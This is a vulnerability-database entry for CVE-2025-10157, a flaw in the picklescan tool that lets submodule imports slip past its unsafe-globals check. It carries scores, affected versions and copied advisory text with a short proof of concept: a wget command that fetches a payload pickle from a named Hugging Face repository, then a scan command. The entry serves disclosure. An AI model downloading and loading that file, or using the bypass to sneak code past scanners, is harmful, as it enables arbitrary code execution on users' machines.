CVE-2025-10157
published 2025-09-17CVE-2025-10157: A Protection Mechanism Failure vulnerability in mmaitre314 picklescan versions up to and including 0.0.30 allows a remote attacker to bypass the unsafe globals…
PriorityP345high7.8CVSS 3.1
AVLACLPRNUIRSUCHIHAH
EPSS
0.76%
50.7th percentile
A Protection Mechanism Failure vulnerability in mmaitre314 picklescan versions up to and including 0.0.30 allows a remote attacker to bypass the unsafe globals check. This is possible because the scanner performs an exact match for module names, allowing malicious payloads to be loaded via submodules of dangerous packages (e.g., 'asyncio.unix_events' instead of 'asyncio').
When the incorrectly considered safe file is loaded after scan, it can lead to the execution of malicious code.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mmaitre314 | picklescan | < 0.0.31 | 0.0.31 |
| mmaitre314 | picklescan | <= 0.0.30 | — |
| mmaitre314 | picklescan | >= 0 < 0.0.31 | 0.0.31 |
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv4.09.3CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Picklescan is Vulnerable to Unsafe Globals Check Bypass through Subclass Imports
osv·2025-09-10
CVE-2025-10157 [CRITICAL] Picklescan is Vulnerable to Unsafe Globals Check Bypass through Subclass Imports
Picklescan is Vulnerable to Unsafe Globals Check Bypass through Subclass Imports
### Summary
The vulnerability allows malicious actors to bypass PickleScan's unsafe globals check, leading to potential arbitrary code execution. The issue stems from PickleScan's strict check for full module names against its list of unsafe globals. By using subclasses of dangerous imports instead of the exact module names, attackers can circumvent the check and inject malicious payloads.
### PoC
1. Download a model that uses the `asyncio` package:
```wget https://huggingface.co/iluem/linux_pkl/resolve/main/asyncio_asyncio_unix_events___UnixSubprocessTransport__start.pkl```
2. Check with PickleScan: `picklescan -p asyncio_asyncio_unix_events___UnixSubprocessTransport__start.pkl -g`
**Expected Result:**
GHSA
Picklescan is Vulnerable to Unsafe Globals Check Bypass through Subclass Imports
ghsa·2025-09-10
CVE-2025-10157 [CRITICAL] CWE-693 Picklescan is Vulnerable to Unsafe Globals Check Bypass through Subclass Imports
Picklescan is Vulnerable to Unsafe Globals Check Bypass through Subclass Imports
### Summary
The vulnerability allows malicious actors to bypass PickleScan's unsafe globals check, leading to potential arbitrary code execution. The issue stems from PickleScan's strict check for full module names against its list of unsafe globals. By using subclasses of dangerous imports instead of the exact module names, attackers can circumvent the check and inject malicious payloads.
### PoC
1. Download a model that uses the `asyncio` package:
```wget https://huggingface.co/iluem/linux_pkl/resolve/main/asyncio_asyncio_unix_events___UnixSubprocessTransport__start.pkl```
2. Check with PickleScan: `picklescan -p asyncio_asyncio_unix_events___UnixSubprocessTransport__start.pkl -g`
**Expected Result:**
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/scanner.py#L309https://github.com/mmaitre314/picklescan/security/advisories/GHSA-f7qq-56ww-84crhttps://huggingface.co/iluem/linux_pkl/resolve/main/asyncio_asyncio_unix_events___UnixSubprocessTransport__start.pkl
2025-09-17
Published